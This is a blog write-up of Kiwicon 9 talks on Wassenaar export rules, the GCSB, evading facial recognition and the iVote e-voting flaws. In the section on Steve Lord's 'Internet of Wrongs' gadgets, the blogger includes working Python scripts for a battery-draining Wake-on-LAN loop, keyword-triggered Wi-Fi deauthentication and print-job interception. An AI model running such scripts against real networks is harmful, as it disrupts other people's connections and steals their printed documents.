Kiwicon 9 Day 2 Morning

Another glorious day in the Cyber Corps! A day in the Cyber Corps is like a day on the server farm. Every meal’s a banquet! Every paycheck a fortune! Every formation a parade! I LOVE the Cyber Corps!

Opening Matters - Friday - Metlstorm @ The St James Theatre

Apparently hacker re-education camp is harder than you’d think. Well, that’s what Metl mumbled as he dragged himself up onto stage with a nice, fresh flesh wound covering half his face.

Metl explained that the keynote speaker had once been “one of us” but she, too, was now reformed, doing policy, and being “the most boring woman in the world.”

Talk: Swinging From the Cyberlier: How to Hack Like Tomorrow Doesn’t Exist Without Flying Sideways of Regulations

Katie Moussouris

Apparently being the most boring woman in the world involves being lowered from the ceiling on a ring. Wearing LED hair extensions. Singing. While gold-lycra-clad dancers perform an interpretation of your music below, with smoke, laser lights, and flames belching from the stage.

I think I’m going to order myself some boring from the Boring Factory. Because that was a spectacle that left me somewhere between hysterics and slack-jawed amazement.

Katie told us a bit about herself; she used to be a hands-on hacker and was the creator of Microsoft’s Bug Bounty program back when (a) Microsoft were trying to get serious about security and (b) a big corporate having a bug bounty program was still quite a novelty. Over time she has shifted into policy land - “fighting for your right to party at ring 0” - which involves a lot of talking and lobbying. As an aside, she noted that she turned down a trip to the White House to make Kiwicon.

Policy? What?

Katie gave a bit of an overview of how policy - and ultimately treaties and laws - are made; people will come up with vague goals, and policy analysts (“I did not know this was a thing you could study at university”) will then work through how these goals can be met; some require treaties, some require law changes, and some may simply require directives to government departments. A key point, noted Katie, is that while policy analysts are experts at turning goals into outcomes they generally lack detailed technical knowledge in any particular field. As such, they lean heavily on whoever is prepared to spend time and energy offering guidance on the finer points of how this shit works.

Which is where Katie (now) comes in. Because the alternative is to leave it up to lobbyists who might not be so friendly.

The Wassenaar Problem

The Wassenaar treaty is a multilateral arms trading treaty. It’s intended to limit the proliferation of various types of physical weaponry, both in terms of what gets sold, and to whom. A cynic would note that, however laudable the treaty’s goals, Saudi Arabia has a whole bunch of cutting-edge military tech, which rather makes one question whether it’s a bit like the arms embargo of the Spanish Civil War1.

But I digress. The intent of Wassenaar is certainly well-meaning. More guns do not, whatever Heinlein told you, lead to a politer society; they just lead to a lot more dead people, and chemical weapons just make everything more awful. These seem like logical sorts of things to regulate, so it might seem a little odd that in 2013 the Wassenaar countries agreed to add “intrusion software and techniques” to the list of controlled items.

As with much of Wassenaar there were good reasons for this: consider the example of prized vile shitbags Hacking Team, a collection of feculent Italians who are very proud of selling tools and expertise to the vilest regimes around (if they can pay) to hunt down dissidents at home and abroad in order to facilitate the kidnapping, torture, and murder thereof. It would not be a bad thing to make it difficult or impossible for this sort of trade to occur.

So the intent of the 2013 changes was to protect people from evil governments and sociopathic monsters. So far, so good.

The Devil is in the Details

Like most international treaties and agreements, Wassenaar does not mandate detailed approaches to the implementation of its goals; signatory governments are expected to introduce domestic rules and legislation to move into compliance with Wassenaar directives. Some countries already have (more on that later), and in 2015 the United States began to work on the changes it would introduce. Because the policy wonks recognised this was an area that might make waves, and one where they don’t have a lot of specific knowledge, they took an unprecedented (and laudable) step: they opened the process up to public comment, something which had never been done before.

All hell broke loose.

There was a lot of feedback, a huge amount of which was unfortunately trolly. Among the serious responses, though, were concerns that the rules would lead to absurd situations, criminalise a huge number of things that shouldn’t be crimes, and quite possibly not solve the problem being aimed at.

Intent vs Execution

So the intent was laudable: keep this stuff away from, say, Syria. But the rules as envisaged would have criminalised research and defensive tools. Some examples of perverse outcomes that weren’t intended:

  • Employees of different nationalities working in the United States, for a United States company, wouldn’t be able to walk down the hallway and talk to one another about a vulnerability - a US citizen talking to a New Zealand citizen, both employed by Oracle, working in San Francisco, would be a serious criminal offence.
  • Bug bounty programs would be effectively criminalised.
  • Multi-use tools would be criminalised based on the worst-case assumption about their use.

There are exceptions to the rules; for example, if you’re publishing publicly, sharing with other researchers, or sending to a single vendor who will publish patches, you’re clean. But there are still many problems with these: Oracle, for example, have a laundry list of WONTFIX security bugs in the Oracle DB. If you send them a notice and they decide not to patch, you’re (potentially) an arms smuggler.

Worse still, the exemptions don’t really have language that allows for things like co-ordinated multi-vendor releases - who’s the vendor for the Heartbleed or (many) Xen bugs? Because there’s no real defined process for dealing with something that has many vendors, and many downstream dependencies.

But worst of all is that the exemptions are a process that requires researchers to talk to the government. There are literally scores of serious security vulnerabilities published a day - Katie asked rhetorically if anyone really believed the government could keep up with the rate of requests involved - the idea is completely unworkable!

What is to be done?

Katie’s work has revolved around educating the policy teams in this space about these sorts of problems, and helping them work towards a better framework. She views this as particularly critical for the United States, since when the 800lb gorilla chooses to implement a treaty in a particular way, it will tend to become the de-facto standard; many countries will simply crib the US implementation for their own, and even if they don’t, the strength of the US in the global market means companies and governments will tend to treat US compliance rules as a must-do simply to be able to do business there.

Katie believes that, as well as the problems identified above, the language referring to “intrusion technology” and “intrusion techniques” is the key element to target; it moves the scope of the Wassenaar treaty from dealing with specific tools to whole categories of research and activity, in a way that makes it impractical for researchers to avoid breaching the rules.

Katie also noted that some countries have implemented more workable versions of the basic Wassenaar protocol - “Yay Australia!”, which is something not often said about Aussie governments and computers in the last decade - and people should encourage this to continue. There are regular Wassenaar updates, so this isn’t a settled issue; keeping on top of them and providing feedback to governments is critical to keeping the agreements sane and workable.

Closing

“Keep yourself and your friends out of jail. The world needs you.”

Talk: Building the Internet of Wrongs

Steve Lord

Steve kicked off his talk by warning that he’s a “horrible cunt” and might breach the code of conduct. Well, um.

He then swung serious for a moment, to explain part of his motivation for visiting New Zealand was to try to track down an old friend who had disappeared without trace, and appealed for anyone who’d seen his mate to let him know. Which is a more somber start than most talks.

That out of the way, Steve kicked on with the main body of his talk, introducing us to SmartPlate: SmartPlate is backed by Science! SmartPlate is, of course, a perfect example of the Internet of Things: cheap, shitty hardware and software pointlessly crammed onto an otherwise functional device to do… not much useful. Can we apply, Steve asks, the same principles to the Internet of Wrongs? Instead of the alphabet soup agencies spending billions on intercept and interference capabilities, what happens if we decide to fuck shit up with cheap crap?

Shitweasel

A past operation in Berlin: a burned-out pen tester/comedian trolls a Mac-loving German hipster. Steve was staying with a mate in Berlin while working the comedy circuit, and Steve’s mate’s flatmate loved his Mac because of its battery life.

Steve, apparently, doesn’t much like Macs or their owners, so decided to have a little fun at the expense of his temporary flatmate. Shitweasel was born: an Arduino board with an 802.11 module, plus a little code that sends Wake-on-LAN packets crafted to wake a Mac. As a result, the Mac never enters a sleep state and its battery runs down bizarrely quickly, draining “its power and the smug from the annoying flatmate”.
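For the curious, the core trick is nothing exotic: a standard Wake-on-LAN magic packet, fired at the target over and over. This isn’t Steve’s Arduino code - just a minimal Python sketch of the same idea, assuming you already know the victim’s MAC address (the one below is made up) and share a broadcast domain with it.

```python
# Minimal Wake-on-LAN pest, in Python rather than Arduino C.
import socket
import time

def send_wol(mac: str, broadcast: str = "255.255.255.255", port: int = 9) -> None:
    """Send a standard WoL magic packet: 6 x 0xFF followed by the MAC 16 times."""
    mac_bytes = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    magic = b"\xff" * 6 + mac_bytes * 16
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        s.sendto(magic, (broadcast, port))

if __name__ == "__main__":
    TARGET_MAC = "AA:BB:CC:DD:EE:FF"   # hypothetical victim MAC
    while True:
        send_wol(TARGET_MAC)           # poke the machine awake...
        time.sleep(60)                 # ...every minute, forever (or six months)
```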

After hiding the device in a cupboard, Steve chortled happily at the flatmate’s bemusement.

Left running for 6 months. Whoops.

“Oh, I see you’ve got a Dell.”

“Ja, I had a horrible experience with Apple Customer Support.”

Apparently the unfortunate victim of Steve’s ire had tried getting his seemingly faulty, fast-draining laptop fixed by Apple, who had, obviously, been unable to find anything wrong with it. Enraged, he had swapped his Apple for a Dell. Steve found this tremendously amusing.

Thunderblade

“If you’re having fun and you don’t take a picture you weren’t really there.”

It turns out Mac users aren’t the only people Steve doesn’t like. He’s not best pleased by “hipsters” (who, like pornography, we know when we see), and their habit of taking photos of everything. Steve is tired of seeing photos of people’s food and their selfies. What can he do about this? With, say, a Raspberry Pi and a wireless card that can do injection?

Scan an open AP for DNS requests via pcap. Check for keywords - Twitter, Instagram, what have you.

Then simply boot the client from the AP via deauth. Which is, I guess, a thing to do if your fun is ruining other people’s fun.
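Steve didn’t hand out code, but the recipe is simple enough that a rough scapy sketch illustrates it - assuming a wireless interface already in monitor mode (wlan0mon below is a placeholder), an open AP whose BSSID you know, and a card that can inject. Deauthing clients you don’t own is illegal in most places, so treat this purely as illustration.

```python
# Sketch of the Thunderblade idea: watch an open AP for DNS lookups of
# offending services, then kick the offending client off with deauth frames.
from scapy.all import sniff, sendp, RadioTap, Dot11, Dot11Deauth, DNSQR

AP_BSSID = "11:22:33:44:55:66"         # hypothetical AP MAC
KEYWORDS = (b"instagram", b"twitter")  # services that trigger the boot
IFACE = "wlan0mon"                     # monitor-mode interface (placeholder)

def boot_hipsters(pkt):
    # DNS query naming one of the offending services?
    if pkt.haslayer(DNSQR) and any(k in pkt[DNSQR].qname.lower() for k in KEYWORDS):
        client = pkt.addr2  # MAC of the station that asked
        # Forge deauth frames "from" the AP to that client.
        deauth = (RadioTap()
                  / Dot11(addr1=client, addr2=AP_BSSID, addr3=AP_BSSID)
                  / Dot11Deauth(reason=7))
        sendp(deauth, iface=IFACE, count=10, inter=0.1, verbose=False)

sniff(iface=IFACE, prn=boot_hipsters, store=False)
```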

Putaprint

Based on OpenWRT.

Uses the Vortex IDS and xpipes. Vortex watches the various printing ports - lp, ipp, and so on. Once a job is found, the stream is sniffed and copied, then attached to a delivery mechanism (like email), where, with a little tidy-up (removing the print commands in the header, for example), it arrives as a PCL file that can be viewed in your inbox. Ever wanted to know what people are printing? Now you do!
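I haven’t seen Steve’s actual Vortex/xpipes configuration, so here’s a toy stand-in in Python with scapy that sketches the same idea: watch the common printer ports, glue together each connection’s payload, and dump it to a file you could then mail to yourself.

```python
# Toy Putaprint: sniff traffic to common printer ports, reassemble each
# connection's payload, and write it out as a raw print job.
from collections import defaultdict
from scapy.all import sniff, IP, TCP, Raw

PRINTER_PORTS = {515, 631, 9100}     # lpr, IPP, raw/JetDirect
jobs = defaultdict(bytes)            # (src, dst, dport) -> captured stream

def grab_print_job(pkt):
    if not (pkt.haslayer(IP) and pkt.haslayer(TCP)):
        return
    if pkt[TCP].dport not in PRINTER_PORTS:
        return
    key = (pkt[IP].src, pkt[IP].dst, pkt[TCP].dport)
    if pkt.haslayer(Raw):
        jobs[key] += bytes(pkt[Raw].load)        # append this chunk of the job
    if pkt[TCP].flags & 0x01 and jobs[key]:      # FIN seen: job is (probably) done
        with open("job_%s_to_%s_%d.prn" % key, "wb") as f:
            f.write(jobs.pop(key))

sniff(filter="tcp port 9100 or tcp port 631 or tcp port 515",
      prn=grab_print_job, store=False)
```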

Retrospective

For less than 50 bucks a pop, we can deny access and intercept sensitive documents, even if the hardware is junk.

Malicious junk hacking is fun (for a certain sort of person).

These toys suck. Remember there are toys which do not.

Talk: REDACTED

The first redacted talk was for fun. This one is a little more serious.

Metl told the story of the time that someone, somewhere, was fiddling with something, and, well, they had to make a call. “Someone accidentally your zone file. Have you considered not outsourcing it?” To the GCSB.

Well that escalated quickly

Which leads us to the identity of the speaker for this section: Una Jagose, Acting Director, GCSB

“It’s funny coming out for an organisation. I did it personally years ago, and it turns out the techniques are the same.”

Una has been the acting head while a new long-term appointment is found; she comes from outside the GCSB, and has been very impressed by the quality of the people she’s been working with there.

The job of the GCSB is foreign intelligence, supporting other agencies, and information assurance and security.

They work with the public and private sectors, including via Cortex (more about that later). A key role is reporting and co-ordinating threat response.

There has been an effort to become more outward facing; they are trying to stay focused on the more serious end of the spectrum: ransomware, financial threats, and compromises of government systems.

Information about detected attacks will be passed on to targeted organisations or individuals, and assistance offered.

Cortex

Cortex provides active and passive threat detection tools above and beyond commercially available tooling, and is available to critical targets: finance, infrastructure, and the like.

The organisation must consent to the use of Cortex, there must be ministerial consent, and a warrant (it wasn’t clear whether this is publicised; it’s also worth noting the minister is generally the Prime Minister, which is a general structural problem with the oversight of our intelligence agencies).

The organisation must keep the use of Cortex confidential (in other words, if your ISP, power company, or bank is using it, they can’t tell you; they probably can’t even tell their own staff).

The proposed ISP roll out of Cortex (which you won’t know about if you’re an ISP customer, so you can’t select ISPs based on whether they do or don’t use this capability) is not intended to siphon customer traffic.

Overall

Una is a much friendlier face than the plonker from the PM’s department that came along last year, and an infinitely less arrogant speaker. Something she did well to stress repeatedly during her talk was that the remit of the GCSB is, ultimately, a political decision; from her point of view, they operate within the law2, so the best way to address concerns with their role is via the parliamentary process.

She ran a Q&A outside the talks, which was so swamped I didn’t even queue for it. Which is a pity, because I’d like to have heard Una’s response to two questions:

  • How does she think that the oversight of the GCSB could be made more meaningful to give the public confidence that there is no untoward behaviour without unduly compromising their role?
  • What can the GCSB do if their minister - that is, a member of the government - starts using their powers in ways which are lawful but clearly against the intent of the organisation?

The second point is particularly important; the military, for example, swear an oath that contains language which supersedes “doing what the government of the day wants” in some cases; the army could legitimately refuse orders they think conflict with their oath. Are we relying on the integrity of individual members of the GCSB if a minister goes rogue? Or is there some systemic way for the Director to say, “No, this isn’t OK”?

Talk: Face Off - Hiding in Plain Sight

ferrouswheel

Facial recognition, and how to mess with it, from a machine learning perspective.

The speaker, Joel Pitt, is an ecoinformatician and AI researcher.

He was responsible for the cycle-powered twirly cylinder at Lux 2015.

Cameras have become ubiquitous, and are never taken away. Newer algorithms are becoming worryingly accurate, and they have been used for retrospective action.

There are 1762 council cameras in Auckland alone and there’s a desire to expand. More warrant-free surveillance (since this talk and my notes were taken, the Wellington City Council has started asking for volunteers to monitor the local panopticon; there is so much surveillance it can’t be run by the available number of humans any more).

Recognising people and behaviour might sound like scifi, but it’s here and there are open source tools; check out samim on github.

(Or Sony’s A6xxx series of digital cameras, which feature “Face Registration”; you can have your consumer camera remember faces to autofocus on in busy scenes, like a party or wedding.)

It’s worth understanding the strengths, weaknesses, and uses of detection vs recognition; detection is fast, efficient, and basic. Recognition needs to be more targeted and has been improving rapidly as compute power and datasets grow. “Labelled Faces in the Wild” is a good sample dataset for understanding how things are going.

Accuracy on LFW was only a bit better than random in 2007; now it’s over 0.95, and commercial systems are beating people. Haar cascades are an example of an efficient classifier on the detection side.
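To give a feel for how cheap the detection side is: OpenCV ships a pre-trained frontal-face Haar cascade, so finding faces in an image takes a handful of lines. This is a generic OpenCV example, not anything from the talk, and crowd.jpg is just a placeholder filename.

```python
# Face *detection* with a stock Haar cascade - the fast, basic end of the
# spectrum. Recognition (putting a name to each box) is the harder part.
import cv2

cascade = cv2.CascadeClassifier(
    cv2.data.haarcascades + "haarcascade_frontalface_default.xml")

img = cv2.imread("crowd.jpg")                    # placeholder input image
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = cascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=5)

for (x, y, w, h) in faces:                       # draw a box around each hit
    cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 2)

print("found %d faces" % len(faces))
cv2.imwrite("detected.jpg", img)
```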

Attack Options

These depend heavily on the problem you’re trying to solve and what the response will be - are you trying to evade detection (not be recognised as a human) or recognition (not be known as a specific human)?

You can’t really attack the training algorithm (used by systems to make decisions about a face) without changing the idea of a human face; you can attack how the system applies it - for example, horizontal flipping breaks some systems. You can spam Facebook by attaching your name to random faces (label spam), which will confuse recognition systems, or resort to facial prosthetics (this has been tested against the 25,000 cameras in Chicago, which are centrally tracked).

But these techniques have limits - unknown or conflicting recognition is a flag for further investigation, so you may simply be making yourself a person of interest.

Avoiding detection may be a bigger win. Masks can be good for this, since an automated system won’t see a face - but governments are responding by criminalising obscuring your face - you can go to prison for ten years in Canada, for example3. Conversely, in other societies masks are acceptable, e.g. in Asia for health reasons. Doesn’t help you if you live in Canada, though.

CV Dazzle can defeat detection - fashion and makeup that make it hard for an algorithm to find a face at all. Cover the nose bridge, use high-contrast makeup, all without breaching any law.

Invisibility glasses: no, really. Reflective, with IR LEDs; given moar power - a 13 W LED, say - these can render cameras useless for this purpose. Unfortunately they’re kind of obvious for now.

Talk: The New South Wales iVote System: Security Failures and Verification Flaws in a Live Online Election

Vanessa Teague

Voting with ballots was not an accident - it was a response to voter corruption and coercion up to the 19th century. There are two competing requirements: a transparent count, and anonymity.

The French urne électorale is a different implementation of a similar system, solving the same problems.

Ceci n’est pas une urne, in 2006, was an early analysis of e-voting.

It’s not just that e-voting is insecure - a voting system needs to fulfil the two outcomes of transparency and anonymity. People suggesting we should overhaul our voting systems should probably ground themselves in an understanding of these considerations before dashing to a solution.

iVote

Used by around 280,000 people in the NSW election, roughly 7% of the electorate.

The promise was to allow people to vote from any device, in any location. Browser-side encryption in JavaScript, with a return number; votes are exported to a verification server, where the voter uses the return number to hear their vote read back in the clear via a telephone call.

Scrutineers cannot see the verification data, so there is no oversight of the third-party verification and reconciliation processes, breaking transparency. Notwithstanding that, the electoral commission claimed everything was secure and inaccessible, and allowed verification by the voter.

Except it wasn’t; it turned out that iVote had (and has) serious security problems. Votes can be man-in-the-middled and the verification process hijacked, so votes can be untraceably altered.

There is no evidence that it was exploited or wasn’t exploited. It is literally impossible to know.

Say that again: there is no evidence that it was exploited or wasn’t exploited.

But the commission continues to claim it’s perfectly secure.

But it’s not. The voting site called out to a third-party Piwik server for stats analysis, which of course loads a bunch of JavaScript from a third party (allowing who knows what). WTF. It got an F for SSL from security rating sites. Researchers demoed an actual attack via the FREAK RSA attack.

The electoral commission spent its time arguing that it couldn’t be a problem. Pity it was still vulnerable after Logjam was disclosed.

“It’s one kind of embarrassing to be vulnerable the week before the election. It’s another to run the election while there are vulnerabilities out there.”

The Real Problem

Only 4,000 people called the verification server, so what few claims about transparency could be made can’t really be checked.

Worse yet, the electoral commission has been incredibly evasive about complaints and verification, and no independent report is available, months after the election. The response, even in the week of Kiwicon, was for officials to go on radio interviews and simply claim there was no evidence of a problem.

NZ Opinions

Since Vanessa had come to New Zealand, she thought she’d have a look at the state of things here. She found a requirements doc for NZ: “Must be verifiable end to end”, which is an awesome requirement. But end-to-end verifiability only really exists in the literature as a general case (special cases like Helios exist) - there are no practical implementations available.

There are, however, lots of Snake Oil salespeople happy to lie about their products, and a lot of people desperate to say they’ve implemented e-voting.

Even if it exists, can it be practically implemented?

Helios

Helios was a system designed for Victorian elections, dealing with a specific challenge: allowing 1,121 Victorian voters residing in London to vote in an election.

You get a receipt at the booth that has a cryptographic copy of your vote.

After the election the crypto is published so you can verify your vote.

Good: You can check your electronic vote, preserving your transparency and anonymity.

Bad: Difficult to understand and field. It’s shiny and new, and not online, so it doesn’t solve the authentication or coercion problem. But it’s a start.
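To make the receipt idea concrete: the sketch below is emphatically not Helios’s real cryptography (which uses ElGamal encryption and homomorphic tallying), just a toy hash-commitment version of “you keep a receipt, the receipts are published, you check yours is in the count”. It also shows why the coercion problem remains: anyone holding your receipt and nonce can see how you voted.

```python
# Toy receipt-and-verify sketch - NOT real Helios crypto.
import hashlib
import os

def commit(vote: str) -> tuple[str, str]:
    """Booth commits to the vote; the voter takes the receipt (and nonce) home."""
    nonce = os.urandom(16).hex()
    receipt = hashlib.sha256((vote + nonce).encode()).hexdigest()
    return receipt, nonce

def verify(vote: str, nonce: str, published: set[str]) -> bool:
    """After the election, check your vote appears among the published receipts."""
    return hashlib.sha256((vote + nonce).encode()).hexdigest() in published

receipt, nonce = commit("candidate_a")
published_receipts = {receipt}          # plus everyone else's receipts
assert verify("candidate_a", nonce, published_receipts)
```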

Thoughts

A great speaker, but it was pretty depressing seeing how the push to e-Voting is proceeding with basically zero care for whether it works, and huge hostility to anyone pointing out the problems with it (particularly when there’s basically no clearly articulated set of reasons as to why it might be a good idea). It’s a pity Kiwicon don’t record presentations, because this one should be mandatory watching for anyone who thinks the whole mess is a good idea - including, I might add, various Green and Labour Wellington City Councillors who mocked people raising concerns about their efforts to ram poorly thought-out proposals through.

No, Celia Wade-Brown, people aren’t concerned about e-Voting because they’re racists who want to stop brown people from voting4. They want to stop 4chan and the Russian intelligence services from faking elections. Although, given the way the 2016 presidential election went, I guess they don’t actually need to hack them to win, anyway.


  1. With which the British, for example, refused to sell either the Fascists or the Republicans weapons. Which might sound very fair, except the Republicans were the legitimate government fighting a coup by the army, who already had most of the weapons they needed. The ones they didn’t, the Germans loaned them. So the embargo was, in practice, support for the Fascist overthrow of the Spanish government. ↩︎

  2. Which sounds nice in theory, but we know that parliament has enacted retrospective legislation to protect the GCSB from the consequences of, well, acting outside the law. ↩︎

  3. I’m guessing this will be prosecuted more often than cases where police, at demonstrations, obscure their identification such as badge numbers. But I’m a bit of a cynic like that. ↩︎

  4. Yes, this was an allegation the former mayor laid at the feet of submitters. Which is the point at which she lost my vote, even if she’d run again. ↩︎
